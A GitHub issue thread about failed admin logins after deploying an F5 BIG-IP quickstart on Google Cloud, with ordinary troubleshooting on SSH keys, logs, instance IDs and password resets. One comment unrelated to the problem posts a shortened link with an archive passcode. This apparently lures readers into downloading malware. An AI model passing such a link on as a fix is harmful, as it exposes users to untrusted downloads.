### ISSUE TITLE
Quickstart BIGIP - Unable to login 

### ISSUE THREAD

**Issue by akayaz** [F5Networks/f5-google-gdm-templates-v2#25]
## Describe the bug
 
I've followed the provided documentation and successfully deployed the quickstart template in my GCP project. But I cannot login into the management instance. I've followed the steps outlined, and i've been trying with admin/<BigIPInstanceName> as per the readme but it doesn't work.
Also I cannot authenticate using SSH to the instance, the when I provide the value equivalent to  <BigIPInstanceName> as a password, authentication fails as well

What is the default admin password for the management console and what are the steps to get the right password to login into the console or ssh? 
 
## Expected behavior
 
login to the BIG IP Web ui using admin / <BigIPInstanceName>
 
## Current behavior
 
Unable to login into the BIG IP Web UI using admin / <BigIPInstanceName>

**Comment by sanketkorde** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by mikeshimkus** [comment]
@akayaz You should be able to login via SSH using key authentication. Google Cloud should copy all the public keys in your project to the instance. Once in, can you share the contents of the files in /var/log/cloud/?

**Comment by akayaz** [comment]
Thanks @mikeshimkus 
I was able to login via SSH using cloudshell; here is the content of the /var/log/cloud 
![image](https://github.com/user-attachments/assets/41ad1839-6155-41a7-8314-cd911a4be489)

**Comment by mikeshimkus** [comment]
@akayaz Can you share the contents of all those log files, please?

**Comment by akayaz** [comment]
Here are the files @mikeshimkus 
There are only 2 as the startup-script-pre-nic-swap.log is empty

[bigIpRuntimeInit.log](https://github.com/user-attachments/files/16897563/bigIpRuntimeInit.log)
[startup-script-post-swap-nic.log](https://github.com/user-attachments/files/16897565/startup-script-post-swap-nic.log)

**Comment by mikeshimkus** [comment]
The logs indicate onboarding finished successfully. You should have been able to login using admin and the instance ID as the password. Did that not work?

**Comment by akayaz** [comment]
@mikeshimkus unfortunately it's not working. 
I've tried with the following : gcloud deployment-manager manifests describe --deployment=yaz-f5-quickstart --format="value(layout)" | yq '.resources[0].outputs[] | select(.name | contains("bigIpInstanceId")).finalValue'

but also gcloud deployment-manager manifests describe --deployment=yaz-f5-quickstart --format="value(layout)" | yq '.resources[0].outputs[] | select(.name | contains("bigIpInstanceName")).finalValue' as per the readme 

None is working and the login keep failing 

Is there a way to reset the password ?

**Comment by mikeshimkus** [comment]
Yes, if you are in with the SSH key you can use the standard tmsh commands to reset passwords: https://my.f5.com/manage/s/article/K13121

This is the lookup for instance ID from metadata. If you view the instance metadata from the GCP console, does the value match what you get from the deployment outputs? 

`  - name: BIGIP_PASSWORD
    type: url
    value: http://169.254.169.254/computeMetadata/v1/instance/id
    headers:
      - name: Metadata-Flavor
        value: Google`

**Comment by akayaz** [comment]
The value doesn't seem to match; this is what I can see in the console as the Instance ID: 
<img width="436" alt="image" src="https://github.com/user-attachments/assets/82d956a2-418f-46bf-a450-7dbd457871f1">

**Comment by akayaz** [comment]
thanks @mikeshimkus 
I've followed the documentation and reset the password using the tmsh tool. 
This is something that should be added in the readme in case anyone face the same issue

**Comment by mikeshimkus** [comment]
Did either the value from the command or the one from metadata work with admin? Seems like a bug if not.

**Comment by curtkersey** [comment]
Hello @mikeshimkus , I am seeing the same issue -- not able to login as user admin or quickstart after deploying using the instance ID as the password.  I was able to login via admin user using SSH key.  I checked, and the value for bigIpInstanceId in output is the same as the instance ID via the curl command to view metadata.  

From output command:
- finalValue: '1207348076324492689'
  name: bigIpInstanceId
  value: $(ref.ckersey-bigip-vm-01.id)

From curl command:
% curl http://169.254.169.254/computeMetadata/v1/instance/id -H "Metadata-Flavor: Google"   
1207348076324492689

I am adding the log files from my deployment.  

I have done it several times - same result each time.  Let me know if there is any more data that you need.

[bigIpRuntimeInit.log](https://github.com/user-attachments/files/17846943/bigIpRuntimeInit.log)
[startup-script-post-swap-nic.log](https://github.com/user-attachments/files/17846946/startup-script-post-swap-nic.log)

**Comment by sam-san91** [comment]
I'm having the same issues - no possibility to log in via password. I'm currently also struggling with the SSH key... :/
